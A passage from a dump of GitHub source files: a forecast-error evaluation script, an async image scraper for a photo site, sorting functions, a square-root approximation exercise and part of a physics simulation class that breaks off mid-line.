respData[\"hits\"][\"hits\"]\n\n if len(observationsArray) == 0:\n break\n\n for observation in observationsArray:\n timestamp_s = int(observation['_source']['timestamp'] / 1000)\n count = int(observation['_source']['value'])\n cur_date = datetime.fromtimestamp(timestamp_s)\n df_row = pd.DataFrame([[cur_date, count]], columns=['time', 'count'])\n generated_ts = generated_ts.append(df_row)\n\nconsumerConn.close()\n\ngenerated_ts.index = generated_ts.time\ngenerated_ts.index.name = 'index'\n\ngenerated_ts = generated_ts.sort_index()\ngenerated_ts[\"numOfObs\"] = range(0, len(generated_ts))\n\nprint(generated_ts)\n\n#in the following code, we read prediction from our textfile for each of the models,\n#compare it to the real prediction we obtained with the previous code and calculate errors, which we publish\n\nwith open('/home/ubuntu/week7task/arima_forecasts.txt') as f:\n line = f.readline()\n\nprint(line)\nline = line.split()\nprint(line)\n\narimaTimestamp = int(line[0])\narimaCount = int(line[1])\n\nprint(generated_ts.time[generated_ts.time < datetime.fromtimestamp(arimaTimestamp/1000)])\n\ntimestamps = generated_ts.time[generated_ts.time < datetime.fromtimestamp(arimaTimestamp/1000)]\n\nif(len(timestamps) != 0):\n\n print(type(timestamps[len(timestamps) - 1]))\n\n print(generated_ts.loc[timestamps[len(timestamps) - 1]])\n\n ts = timestamps[len(timestamps) - 1]\n\n realCount = generated_ts.loc[ts][\"count\"]\n\n predictedCount = np.array(arimaCount)\n realCount = np.array(realCount)\n\n print(type(predictedCount))\n\n print(realCount)\n print(type(realCount))\n\n maeErr = mae(realCount, predictedCount)\n print(\"mae\" + str(maeErr))\n\n rmseErr = rmse(realCount, predictedCount)\n print(\"rmse\" + str(rmseErr))\n\n mapeErr = mape(realCount, predictedCount)\n print(\"mape\" + str(mapeErr))\n\n smapeErr = smape(realCount, predictedCount)\n print(\"smape\" + str(smapeErr))\n\n #MASE cannot be computed for just one point since it looks at lag 1\n\n #if(len(realCount) == 1):\n # maseErr = mae(realCount, predictedCount)\n #else:\n # maseErr = mase(realCount, predictedCount)\n #maseErr = mase(np.array([2]), np.array([1]), 0)\n #print(\"mase\" + str(maseErr))\n\n #push all the metrics to platform\n publishErr(\"mae_arima\", maeErr, arimaTimestamp)\n publishErr(\"rmse_arima\", rmseErr, arimaTimestamp)\n publishErr(\"mape_arima\", mapeErr, arimaTimestamp)\n publishErr(\"smape_arima\", smapeErr, arimaTimestamp)\n #publish(\"mase\", maseErr, timestamp)\n arimaErrors = [maeErr, rmseErr, mapeErr, smapeErr]\n\nwith open('/home/ubuntu/week7task/lstm_forecasts.txt') as f:\n line = f.readline()\n\nprint(line)\nline = line.split()\nprint(line)\n\nlstmTimestamp = int(line[0])\nlstmCount = int(line[1])\n\nprint(generated_ts.time[generated_ts.time < datetime.fromtimestamp(lstmTimestamp/1000)])\n\ntimestamps = generated_ts.time[generated_ts.time < datetime.fromtimestamp(lstmTimestamp/1000)]\n\nif(len(timestamps) != 0):\n\n print(type(timestamps[len(timestamps) - 1]))\n\n print(generated_ts.loc[timestamps[len(timestamps) - 1]])\n\n ts = timestamps[len(timestamps) - 1]\n\n realCount = generated_ts.loc[ts][\"count\"]\n\n predictedCount = np.array(lstmCount)\n realCount = np.array(realCount)\n\n print(type(predictedCount))\n\n print(realCount)\n print(type(realCount))\n\n maeErr = mae(realCount, predictedCount)\n print(\"mae\" + str(maeErr))\n\n rmseErr = rmse(realCount, predictedCount)\n print(\"rmse\" + str(rmseErr))\n\n mapeErr = mape(realCount, predictedCount)\n print(\"mape\" + str(mapeErr))\n\n smapeErr = smape(realCount, predictedCount)\n print(\"smape\" + str(smapeErr))\n\n #if(len(realCount) == 1):\n # maseErr = mae(realCount, predictedCount)\n #else:\n # maseErr = mase(realCount, predictedCount)\n #maseErr = mase(np.array([2]), np.array([1]), 0)\n #print(\"mase\" + str(maseErr))\n\n #push all the metrics to platform\n publishErr(\"mae_lstm\", maeErr, lstmTimestamp)\n publishErr(\"rmse_lstm\", rmseErr, lstmTimestamp)\n publishErr(\"mape_lstm\", mapeErr, lstmTimestamp)\n publishErr(\"smape_lstm\", smapeErr, lstmTimestamp)\n #publish(\"mase\", maseErr, timestamp)\n lstmErrors = [maeErr, rmseErr, mapeErr, smapeErr]\n\nwith open('/home/ubuntu/week7task/prop_forecasts.txt') as f:\n line = f.readline()\n\nprint(line)\nline = line.split()\nprint(line)\n\npropTimestamp = int(line[0])\npropCount = int(line[1])\n\nprint(generated_ts.time[generated_ts.time < datetime.fromtimestamp(propTimestamp/1000)])\n\ntimestamps = generated_ts.time[generated_ts.time < datetime.fromtimestamp(propTimestamp/1000)]\n\nif(len(timestamps) != 0):\n\n print(type(timestamps[len(timestamps) - 1]))\n\n print(generated_ts.loc[timestamps[len(timestamps) - 1]])\n\n ts = timestamps[len(timestamps) - 1]\n\n realCount = generated_ts.loc[ts][\"count\"]\n\n predictedCount = np.array(propCount)\n realCount = np.array(realCount)\n\n print(type(predictedCount))\n\n print(realCount)\n print(type(realCount))\n\n maeErr = mae(realCount, predictedCount)\n print(\"mae\" + str(maeErr))\n\n rmseErr = rmse(realCount, predictedCount)\n print(\"rmse\" + str(rmseErr))\n\n mapeErr = mape(realCount, predictedCount)\n print(\"mape\" + str(mapeErr))\n\n smapeErr = smape(realCount, predictedCount)\n print(\"smape\" + str(smapeErr))\n\n #if(len(realCount) == 1):\n # maseErr = mae(realCount, predictedCount)\n #else:\n # maseErr = mase(realCount, predictedCount)\n #maseErr = mase(np.array([2]), np.array([1]), 0)\n #print(\"mase\" + str(maseErr))\n\n #push all the metrics to platform\n publishErr(\"mae_prop\", maeErr, propTimestamp)\n publishErr(\"rmse_prop\", rmseErr, propTimestamp)\n publishErr(\"mape_prop\", mapeErr, propTimestamp)\n publishErr(\"smape_prop\", smapeErr, propTimestamp)\n #publish(\"mase\", maseErr, timestamp)\n propErrors = [maeErr, rmseErr, mapeErr, smapeErr]\n\n#we made function for comparing errors which gives us scores for each model\narimaScore = compare(arimaErrors, lstmErrors, propErrors)\nlstmScore = compare(lstmErrors, arimaErrors, propErrors)\npropScore = compare(propErrors, lstmErrors, arimaErrors)\n\nprint(arimaScore)\nprint(lstmScore)\nprint(propScore)\n\n#the model with the biggest score wins\nif(lstmScore >= arimaScore and lstmScore >= propScore):\n print(\"lstm wins\")\n publishPred(lstmCount, lstmTimestamp)\nelif(propScore >= arimaScore and propScore >= lstmScore):\n print(\"prop wins\")\n publishPred(propCount, propTimestamp)\nelse:\n print(\"arima wins\")\n publishPred(arimaCount, arimaTimestamp)\n\n#femove forecast from txt files to free space\nwith open('/home/ubuntu/week7task/arima_forecasts.txt', 'r') as fin:\n data = fin.read().splitlines(True)\nwith open('/home/ubuntu/week7task/arima_forecasts.txt', 'w') as fout:\n fout.writelines(data[1:])\n\nwith open('/home/ubuntu/week7task/lstm_forecasts.txt', 'r') as fin:\n data = fin.read().splitlines(True)\nwith open('/home/ubuntu/week7task/lstm_forecasts.txt', 'w') as fout:\n fout.writelines(data[1:])\n\nwith open('/home/ubuntu/week7task/prop_forecasts.txt', 'r') as fin:\n data = fin.read().splitlines(True)\nwith open('/home/ubuntu/week7task/prop_forecasts.txt', 'w') as fout:\n fout.writelines(data[1:])\n","repo_name":"lizardqueen98/InternetOfThingsPraktikum","sub_path":"Code/Virtual edge code/metricsEval.py","file_name":"metricsEval.py","file_ext":"py","file_size_in_byte":15481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72621647608","text":"#! /usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: \"fraser\"\n# Date: 2018-6-17\n# 福利\n\nimport asyncio\nimport aiohttp\nfrom aiohttp import web\nimport urllib.request as request\nfrom bs4 import BeautifulSoup as bs\nimport json\nimport os\nimport uuid\nimport multiprocessing\nimport threading\nfrom multiprocessing import Queue, Pool, Process\n\ncount = 1\n\n\nasync def fetch(url):\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n if response.status == 200:\n return await response.text()\n else:\n raise Exception(\"这是一个错误\")\n\n\nclass parseListPage():\n '''\n 获取类型图片 一级页面\n '''\n\n def __init__(self, page_str):\n self.page_str = page_str\n\n def __enter__(self):\n page_str = self.page_str\n page = bs(page_str, 'html.parser')\n a = page.find('ul', attrs={'id': 'pins'}).find_all('li')\n images = []\n for child in a:\n obj = child.find_next('a')\n time = child.find_next('span', attrs={'class': 'time'}).text\n url = obj.get('href')\n images.append({'url': url, 'name': obj.find(\n 'img').get('alt'), 'time': time})\n return images\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n pass\n\n\nasync def praseImg(url, path):\n '''\n 抓取图片\n '''\n try:\n \n html = await fetch(url)\n page = bs(html, 'html.parser')\n print(url)\n img = page.find(\n 'div', attrs={'class': 'main-image'}).find('img').get('src')\n await downImg(img, path)\n except Exception as e:\n print(e)\n raise Exception(e)\n\n\nasync def praseImgs(url):\n '''\n 抓取二级页面网站\n '''\n try:\n imgs = []\n print('-------------- \\033[1;35m 开始二级页面%s的抓取 \\033[0m!' % url)\n imgs.append(url)\n html = await fetch(url)\n page = bs(html, 'html.parser')\n node = page.find('div', attrs={'class': 'pagenavi'}).find_all('a')\n if len(node)<4:\n return None\n a = node[-2].get('href').split('/')\n\n for i in range(2, int(a[-1])+1):\n imgs.append(url+'/'+str(i))\n print('-------------- \\033[1;35m 完成二级页面%s的抓取 \\033[0m!' % url)\n return {'folder': url.split('/')[-1], 'urls': imgs}\n except Exception as e:\n print(e)\n raise Exception(e)\n\n\nasync def downImg(url, path):\n global count\n count += 1\n print('-------------', path+'\\\\'+url.split('/')[-1])\n if os.path.exists(path+'\\\\'+url.split('/')[-1]):\n return\n header = {\n 'Referer': url,\n 'X-DevTools-Emulate-Network-Conditions-Client-Id': 'DB3AC464E06BFD77CD35121525D27455',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'}\n print('----------------- \\033[1;35m 开始下载%s \\033[0m!' % url)\n req = request.Request(url, headers=header)\n data = request.urlopen(req).read()\n print(' ---------------- \\033[1;35m 完成下载%s \\033[0m!' % url)\n with open(path+'\\\\'+url.split('/')[-1], 'wb') as f:\n print(count,'----',threading.current_thread())\n \n f.write(data)\n \n f.close()\n\n\nasync def main(url):\n # print(await praseImgs('http://www.mzitu.com/137510'))\n # await downImg('http://i.meizitu.net/2018/04/22b01.jpg', '11.jpg')\n # request.urlretrieve('http://i.meizitu.net/2018/06/13c02.jpg', '11.jpg')\n\n html = await fetch(url)\n print('开始%s页面的抓取' % url)\n with parseListPage(html) as tmp:\n print('完成%s页面的抓取' % url)\n for item in tmp:\n obj = await praseImgs(item['url'])\n \n if obj is None:\n continue\n o_path = 'd:\\\\work\\\\image\\\\%s' % item['time']\n path = o_path+'\\\\%s' % obj['folder']\n if os.path.exists(o_path) != True:\n os.mkdir(o_path)\n if os.path.exists(path) != True:\n os.mkdir(path)\n for str_url in obj['urls']:\n await praseImg(str_url, path)\n\n\n\ndef process_start(*pages):\n loop = asyncio.get_event_loop()\n tasks = [main(url) for url in pages]\n loop.run_until_complete(asyncio.wait(tasks))\n loop.close()\ndef task_start():\n pages = []\n # pages.append('http://www.mzitu.com')\n # p = Process(target=process_start, args=pages)\n # p.start()\n for page in range(20, 21):\n pages=[]\n pages.append(\"http://www.mzitu.com/page/%s\" % page)\n p = Process(target=process_start, args=pages)\n p.start()\n\n\nif __name__ == '__main__':\n task_start()\n\n\n# loop = asyncio.get_event_loop()\n# tasks = [main(url) for url in pages]\n# loop.run_until_complete(asyncio.wait(tasks))\n# loop.close()\n","repo_name":"FraserPeng/python-learning","sub_path":"shikaku/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22076848181","text":"def insertion(values):\n\tsorted = []\n\twhile len(values):\n\t\tvalue = values.pop()\n\t\tif len(sorted) == 0 or sorted[len(sorted) - 1] <= value:\n\t\t\t# If the sorted array has no items yet or the current value is larger than all others\n\t\t\t# (the largest value will always be the highest index)\n\t\t\t# just append the value to the end of the sorted array\n\t\t\tsorted.append(value)\n\t\t\tcontinue\n\t\telse:\n\t\t\t# inject into sorted accordingly\n\t\t\tfor index, compare in enumerate(sorted):\n\t\t\t\tif compare >= value:\n\t\t\t\t\t# If the value is less or equal to what we're comparing to, \n\t\t\t\t\t# insert the value where we're at in the sorted array.\n\t\t\t\t\tsorted.insert(index, value)\n\t\t\t\t\tbreak\n\t\t\t\tif index == len(sorted) - 1:\n\t\t\t\t\t# If we're at this point then we've gone through the full array and the current value is the lowest of the bunch. \n\t\t\t\t\t# Insert it at the head.\n\t\t\t\t\tsorted.insert(0, value)\n\treturn sorted\n\n\ndef selection(values):\n\tmin = 0\n\tfor index, value in enumerate(values):\n\t\t# set current index as lowest value\n\t\tmin = index\n\t\tfor subIndex, compare in enumerate(values[index+1:]):\n\t\t\t# iterate through remaining items and find the smallest\n\t\t\tif compare < values[min]:\n\t\t\t\t# Reset min - make sure to add index since we're looping through a sub-list.\n\t\t\t\t# Make sure to also add 1 since we're comparing 1 step ahead of the current outter loop index.\n\t\t\t\tmin = subIndex + index + 1\n\t\tif min > index:\n\t\t\t# if there was a lower value found later in the list, swap the items\n\t\t\tvalues[index], values[min] = values[min], values[index]\n\treturn values","repo_name":"michaelpidde/sorting","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"34060096133","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 23 20:02:13 2019\n\n@author: Will\n\"\"\"\n\nsquare=float(input(\"Give a number\"))\nepsilon=0.0001\nguess=0.0\nincrement=0.0001\nnum_guesses=0\nwhile abs(guess**2-abs(square))>=epsilon and abs(guess)<=abs(square):\n guess+=increment\n num_guesses+=1\n if abs(guess**2)>abs(square):\n guess-=increment\n increment/=10\nprint(guess)\nprint(num_guesses)","repo_name":"cuichacha/MIT-6.00.1x","sub_path":"Week 2: Simple Programs/3. Simple Algorithms/approx solution with varying increment.py","file_name":"approx solution with varying increment.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39203720342","text":"from numpy import log2, ceil, sqrt, arccos, arctan2\nfrom numpy.linalg import norm\n\nfrom itertools import product\n\nfrom common import close, encase, percent, ϕ\nfrom common import echo, B_direction, inplane_vector_from_angle\nfrom fit import para_min, fit_min\nfrom psi import Psi\n\n\n# Structure class representing calculations for given structure and fields\nclass Structure():\n # Initialize object\n def __init__(self, sim, n_str, E_xy, B):\n # Assign variables\n self.sim = sim # Simulation object, needed to read files\n self.projectname = sim.projectname # Project name\n self.options = sim.options # Options object\n self.n_str = n_str # Structure number\n self.E_xy = E_xy # In-plane E-field list\n self.E_x = E_xy[0] # E-field in x direction\n self.E_y = E_xy[1] # E-field in y direction\n self.calcs = [] # Calculations list\n self.B = B if \"Brotate\" not in self.sim.output_filename else inplane_vector_from_angle(self.angle) # Magnetic field tuple\n self.B_val = norm(B) # Magnetic field tuple\n self.B_x = self.B[0] # B-field in x direction\n self.B_y = self.B[1] # B-field in y direction\n self.B_z = self.B[2] # B-field in z direction\n # Min and max E-field considered for calculations\n self.limits = list(self.options.default_limits)\n self.B_direction = B_direction(self.B) if \"Brotate\" not in self.sim.output_filename else \"[110]\"\n self.additional = None\n self.coeffs = None\n self.minimum = None\n self.E_min_diff = None\n self.minimum_index = None\n\n # Previous structure in the list, may or may not be overwritten\n self.previous = None\n self.previous2 = None\n self.previous3 = None\n self.next = None\n self.next2 = None\n self.next3 = None\n\n ###########################################################################\n # Ranges #\n ###########################################################################\n\n # Either outer or inner E-field range\n def E_range(self, outer=True, minimum=None):\n if minimum is not None:\n return self.minimum_range(minimum)\n else:\n return self.outer_range if outer else self.inner_range\n\n def minimum_range(self, minimum):\n left_border = minimum - self.options.minima_vicinity / 2.0\n right_border = minimum + self.options.minima_vicinity / 2.0\n left_list = [E for E in self.E_z_list if E <= left_border]\n right_list = [E for E in self.E_z_list if E >= right_border]\n if left_list and right_list:\n left = max(left_list)\n right = min(right_list)\n return (left, right)\n return None\n\n # Check if given E-field value is in range\n def in_range(self, E, outer=True, minimum=None):\n # This includes edge cases\n current_range = self.E_range(outer, minimum)\n return current_range[0] <= E <= current_range[1]\n\n # Check if given E-field value is in range\n def in_range_exclusive(self, E, outer=True, minimum=None):\n # This includes edge cases\n current_range = self.E_range(outer, minimum)\n return current_range[0] < E < current_range[1]\n\n # Return position within a range from 0 to 1, -1 if outside the range\n def pos_in_range(self, E, outer=True, minimum=None):\n if self.in_range(E, outer, minimum):\n distance_to_left = (E - self.E_range(outer, minimum)[0])\n return distance_to_left / self.span(outer, minimum)\n else:\n return -1\n\n # Inner and outer lengths of the ranges\n def span(self, outer=True, minimum=None):\n if minimum is None:\n return self.outer_span if outer else self.inner_span\n else:\n return self.minimum_span(minimum)\n\n @property\n def outer_span(self):\n return self.outer_range[1] - self.outer_range[0]\n\n @property\n def inner_span(self):\n return self.inner_range[1] - self.inner_range[0]\n\n def minimum_span(self, minimum):\n current_range = self.minimum_range(minimum)\n return current_range[1] - current_range[0]\n\n ###########################################################################\n # Gaps and bounds #\n ###########################################################################\n\n # Gap in Ez in percents, either maximum or at the bounds\n def gap(self, outer, maximum=False):\n E_list = self.E_list_in_range(outer)\n # If E_list empty return 100%\n if len(E_list) <= 1:\n return 1.0 if maximum else [1.0, 1.0]\n E_diff = self.E_diff_list_in_range(outer)\n # If maximum return largest gap\n if maximum:\n return max(E_diff) / self.span(outer)\n # Otherwise return gaps in the edges\n else:\n return E_diff[0] / self.span(outer), E_diff[-1] / self.span(outer)\n\n @property\n def right(self):\n span = self.outer_range[1] - self.inner_range[1] if self.options.gfactor_to_right else self.inner_range[0] - self.outer_range[0]\n if not span:\n return 1.0, 1.0\n if self.options.gfactor_to_right:\n span += self.E_diff_list_in_range(False)[-1]\n E_left = self.E_diff_list_in_range(False)[-1]\n E_right = self.E_diff_list_in_range(True)[-1]\n else:\n span += self.E_diff_list_in_range(False)[0]\n E_right = self.E_diff_list_in_range(False)[0]\n E_left = self.E_diff_list_in_range(True)[0]\n return E_left / span, E_right / span\n\n # E-field for calculations at the bounds\n def bound_E(self, i, outer, error=0):\n E_lists = self.E_diff_list_in_threshold(outer)\n if i == 0:\n return E_lists[0][0] + ϕ(error) * E_lists[0][1]\n elif i == 1:\n return E_lists[-1][0] + (1 - ϕ(error)) * E_lists[-1][1]\n\n # Precision of bounds calculation\n def bound_E_percent(self, i, outer):\n E_lists = self.E_diff_list_in_threshold(outer)\n if i == 0:\n return E_lists[0][1] / self.span(outer)\n elif i == 1:\n return E_lists[-1][1] / self.span(outer)\n\n ##########################################################################\n # E-field lists #\n ##########################################################################\n\n def E_boundary(self, outer=True, left=True):\n E_list = self.E_list_in_range(outer)\n if left:\n return [E_list[0], E_list[1]]\n else:\n return [E_list[-2], E_list[-1]]\n\n # List of all E-field values\n @property\n def E_z_list(self):\n result = [calc.E_z for calc in self.calcs]\n\n if result == []:\n result = [self.limits[0]] + result + [self.limits[1]]\n else:\n if self.limits[0] < result[0]:\n result = [self.limits[0]] + result\n if self.limits[1] > result[-1]:\n result = result + [self.limits[1]]\n\n return result\n\n # E-field list within a given range\n def E_list_in_range(self, outer):\n E_range = self.E_range(outer)\n return [i for i in self.E_z_list if E_range[0] <= i <= E_range[1]]\n\n # E-field differences list within a given range\n def E_diff_list_in_range(self, outer):\n E_list = self.E_list_in_range(outer)\n return [E_list[i] - E_list[i - 1] for i in range(1, len(E_list))]\n\n # E-field and their differences list within given range and threshold\n def E_diff_list_in_threshold(self, outer, threshold=0.0):\n E_list = self.E_list_in_range(outer)\n E_diff_list = self.E_diff_list_in_range(outer)\n return [(i, j) for i, j in zip(E_list, E_diff_list) if j >= threshold]\n\n ###########################################################################\n # Calculations #\n ###########################################################################\n\n # Calculate additional points in blank spaces\n def fill_blanks(self, outer=True):\n # Minimal size of blank space to be filled\n threshold = self.options.fill_blanks_limit * self.span(outer)\n\n # Loop over E-fields and differences within threshold\n for E, E_diff in self.E_diff_list_in_threshold(outer, threshold):\n # Number of points to fill the blank space\n n = int(E_diff / threshold)\n # Do calculations n times\n for j in range(n):\n Psi(self, outer=outer,\n E_z=E + E_diff * (j + 1) / (n + 1),\n eps_factor=self.eps_factor(outer),\n message=\"Filling blanks in \" + self.title(outer),\n E_diff=E_diff / self.span(outer) / n,\n error=self.options.fill_blanks_limit).run()\n\n # Calculate additional points in blank spaces\n def fill_blanks_near_anticrossing(self):\n # Minimal size of blank space to be filled\n threshold = self.options.fill_blanks_limit\n threshold *= self.span(outer=False, minimum=self.minimum.E_z)\n # Loop over E-fields and differences within threshold\n for E, E_diff in self.E_diff_list_in_threshold(False, threshold):\n if not self.in_range(E, outer=False, minimum=self.minimum.E_z):\n continue\n # Number of points to fill the blank space\n n = int(E_diff / threshold)\n # Do calculations n times\n for j in range(n):\n Psi(self, outer=False,\n E_z=E + E_diff * (j + 1) / (n + 1),\n eps_factor=self.eps_factor(False),\n message=\"Filling blanks in \" + self.title(False),\n E_diff=E_diff / self.span(False) / n,\n minimum=self.minimum.E_z,\n error=self.options.fill_blanks_limit).run()\n\n # Calculate bounds, either outer or inner\n def calc_bounds(self, outer=True, left=True, right=True):\n # Counter checking which side to calcule: 0 - left, 1 - right\n bounds = self.gap(outer)\n i = 0 if bounds[0] > bounds[1] else 1\n if right and not left:\n i = 1\n if left and not right:\n i = 0\n\n bounds_factor = self.bounds_factor(outer, i)\n # Do calculations as long as bounds are too large\n while max(bounds) >= self.options.bound_limit / bounds_factor:\n # Text to be displayed\n side = \"bounds to the right\" if i % 2 else \"bounds to the left\"\n # Additional factor to account for possible change in ranges\n bounds_factor = self.bounds_factor(outer, i)\n\n # Do calculation if density of the points not big enough\n if bounds[i % 2] >= self.options.bound_limit / bounds_factor:\n error = self.options.bound_limit / bounds_factor\n E_diff = bounds[i % 2]\n Psi(self, outer=outer,\n E_z=self.bound_E(i % 2, outer, E_diff),\n eps_factor=self.eps_factor(outer),\n E_diff=E_diff,\n message=\"Generating \" + self.title(outer) + \" \" + side,\n error=error\n ).run()\n # Else try the other side or stop calculation\n else:\n if left and right:\n i += 1\n # Else break as we want only one side to be calculated\n else:\n break\n # Update information about bounds\n bounds = self.gap(outer)\n\n def calc_right(self):\n bounds = self.right\n bounds_factor_left = self.bounds_right[0]\n bounds_factor_right = self.bounds_right[1]\n while bounds[1] >= self.options.right_limit / bounds_factor_right:\n bounds = self.right\n bounds_factor_right = self.bounds_right[1]\n message = \"Fine filling right\"\n if bounds[1] >= self.options.right_limit / bounds_factor_right:\n error = self.options.right_limit / bounds_factor_right\n E_diff = bounds[1]\n Psi(self, outer=True,\n E_z=self.bound_E(1 if self.options.gfactor_to_right else 0, self.options.gfactor_to_right, E_diff),\n eps_factor=self.eps_factor(self.options.gfactor_to_right),\n E_diff=E_diff,\n message=message,\n error=error\n ).run()\n while bounds[0] >= self.options.right_limit / bounds_factor_left:\n bounds = self.right\n bounds_factor_left = self.bounds_right[0]\n message = \"Fine filling left\"\n if bounds[0] >= self.options.right_limit / bounds_factor_left:\n error = self.options.right_limit / bounds_factor_left\n E_diff = bounds[0]\n Psi(self, outer=True,\n E_z=self.bound_E(1 if self.options.gfactor_to_right else 0, not self.options.gfactor_to_right, E_diff),\n eps_factor=self.eps_factor(not self.options.gfactor_to_right),\n E_diff=E_diff,\n message=message,\n error=error\n ).run()\n\n def calc_based_on_previous(self):\n for outer, left in product([True, False], [False, True]):\n message = \"Generating {} based on previous\".format(\n 'outer' if outer else 'inner')\n for struct in [self.previous, self.next, self.previous2, self.next2, self.previous3, self.next3]:\n if struct is None:\n continue\n for E in struct.E_boundary(outer, left)[::-1]:\n i = 0 if left else 1\n bounds = self.gap(outer)\n bounds_factor = self.bounds_factor(outer, i)\n if bounds[i] < self.options.bound_limit / bounds_factor:\n continue\n E_l, E_r = self.E_boundary(outer=outer, left=left)\n if E_l < E < E_r:\n Psi(self, outer,\n E_z=E,\n message=message,\n E_diff=bounds[i],\n eps_factor=self.eps_factor(outer),\n error=self.options.bound_limit / bounds_factor\n ).run()\n if self.options.calc_minima_from_previous and self.minimum is not None:\n for struct in [self.previous, self.next, self.previous2, self.next2, self.previous3, self.next3]:\n if struct is None:\n continue\n if not struct.has_minimum:\n continue\n if self.E_min_diff < self.options.minima_eps:\n continue\n here_range = self.minimum_range(self.E_min)\n if here_range is None:\n continue\n if here_range[0] < struct.E_min < here_range[1]:\n if close(here_range[0], struct.E_min):\n continue\n if close(here_range[1], struct.E_min):\n continue\n if close(self.minimum.E_z, struct.E_min):\n continue\n Psi(self, outer,\n E_z=struct.E_min,\n E_diff=(here_range[1] - here_range[0]\n ) / self.span(False),\n message=\"Generating minima from previous\",\n eps_factor=self.options.eps_factor_for_minima,\n minimum=None if outer else self.E_min,\n error=self.options.minima_eps / self.span(outer)\n ).run()\n\n def bounds_factor(self, outer, i):\n bounds = self.gap(outer)\n if bounds[0] != 1:\n return 1 / (1 - bounds[(i + 1) % 2])\n else:\n return 1.0\n\n @property\n def bounds_right(self):\n bounds = self.right\n if bounds[0] != 1:\n return 1 / (1 - bounds[1]), 1 / (1 - bounds[0])\n else:\n return 1.0, 1.0\n\n ###########################################################################\n # Minima calculations #\n ###########################################################################\n\n def gen_various(self):\n if self.additional is not None:\n return None\n\n if self.sim.options.gtensor_E is None:\n bounds_factor_left = self.bounds_right[0]\n bounds_factor_right = self.bounds_right[1]\n bounds = self.right\n if bounds[1] >= self.options.right_limit / bounds_factor_right:\n return None\n if bounds[0] >= self.options.right_limit / bounds_factor_left:\n return None\n\n outer_range = self.E_range(True)\n inner_range = self.E_range(False)\n i = 1 if self.options.gfactor_to_right else 0\n E_goal = (inner_range[i] + outer_range[i]) / 2\n E_z = E_goal\n else:\n E_z = self.sim.options.gtensor_E\n\n Psi(self, outer=True,\n E_z=E_z,\n message=\"Generating additional data\",\n eps_factor=1e0\n ).run()\n\n # Find and generate points for minimas\n def gen_minimas(self, outer=False):\n if self.minimum is None:\n return None\n # Initialize counter variables\n do_bisection = 0\n\n while True:\n i = self.minimum_index\n if self.E_min_diff < self.options.minima_eps:\n return None\n do_bisection += 1\n # Decide which method to use\n if not do_bisection % self.options.bisection_freq:\n self.bisection_minimum(i, outer)\n elif do_bisection % self.options.parabola_freq:\n self.fitting_minimum(i, outer)\n else:\n self.parabola_minimum(i, outer)\n\n # Look for a minimum using bisection method\n def bisection_minimum(self, i, outer):\n E_list = self.E_list_minimum(i)\n # Calculate to the left\n error = self.options.minima_eps / self.span(outer)\n E_diff = self.E_min_diff / self.span(outer)\n if self.calcs[i - 1].anti > self.calcs[i + 1].anti:\n E_z = E_list[1] - (E_list[1] - E_list[0]) * (1 - ϕ(E_diff))\n # Calculate to the right\n else:\n E_z = E_list[1] + (E_list[2] - E_list[1]) * (1 - ϕ(E_diff))\n # Run the calculation\n Psi(self, outer,\n E_z=E_z*0.98+(E_list[2] + E_list[0])/2*0.02,\n E_diff=E_diff,\n message=\"Generating minima by bisection\",\n eps_factor=self.options.eps_factor_for_minima,\n minimum=None if outer else E_list[1],\n error=error\n ).run()\n\n # Look for a minimum using parabola method\n def parabola_minimum(self, i, outer):\n E_list = self.E_list_minimum(i)\n # Find E-field for a suspected minimum\n E_min = para_min(self.calcs[i - 1], self.calcs[i], self.calcs[i + 1])\n # Exit if parabola calculations are not precise enough\n if not E_list[0] < E_min < E_list[2]:\n echo(\"Fitting by fitting v2 skipped! \" +\n \"{} not in range {}-{}\".format(E_min, E_list[0], E_list[2]))\n # Calculate point for the suspected minimum if not already calculated\n if not close(E_min, E_list[1]):\n Psi(self, outer,\n E_z=E_min*0.98+(E_list[2] + E_list[0])/2*0.02,\n E_diff=self.E_min_diff / self.span(outer),\n message=\"Generating minima by parabolas\",\n eps_factor=self.options.eps_factor_for_minima,\n minimum=None if outer else E_list[1],\n error=self.options.minima_eps / self.span(outer)\n ).run()\n # Calculate two points nearby to get proper range\n else:\n for sign in [-1, 1]:\n if self.E_min_diff < self.options.minima_eps:\n return None\n side = \"left\" if sign == -1 else \"right\"\n Psi(self, outer,\n E_z=E_min + sign * self.options.minima_eps / 20,\n E_diff=self.E_min_diff / self.span(outer),\n message=\"Minima confirmed, \" + side + \" vicinity\",\n eps_factor=self.options.eps_factor_for_minima,\n minimum=None if outer else E_list[1],\n error=self.options.minima_eps / self.span(outer)\n ).run()\n\n def fitting_minimum(self, i, outer):\n E_list = self.E_list_minimum(i)\n # Find E-field for a suspected minimum\n x = [c.E_z for c in self.calcs if c.E_z in E_list]\n y = [c.anti for c in self.calcs if c.E_z in E_list]\n E_min = fit_min(x, y, x_0=x[1])\n # Exit if parabola calculations are not precise enough\n if not E_list[0] < E_min < E_list[2]:\n echo(\"Fitting by fitting v2 skipped! \" +\n \"{} not in range {}-{}\".format(E_min, E_list[0], E_list[2]))\n # Calculate point for the suspected minimum if not already calculated\n elif not close(E_min, E_list[1]):\n Psi(self, outer,\n E_z=E_min*0.98+(E_list[2] + E_list[0])/2*0.02,\n E_diff=self.E_min_diff / self.span(outer),\n message=\"Generating minima by fitting\",\n eps_factor=self.options.eps_factor_for_minima,\n minimum=None if outer else E_list[1],\n error=self.options.minima_eps / self.span(outer)).run()\n\n ##########################################################################\n # Minima misc. #\n ##########################################################################\n\n # Check if a given point is a local minimum\n def is_local_minimum(self, i):\n min_neighbor = min(self.calcs[i + 1].anti, self.calcs[i - 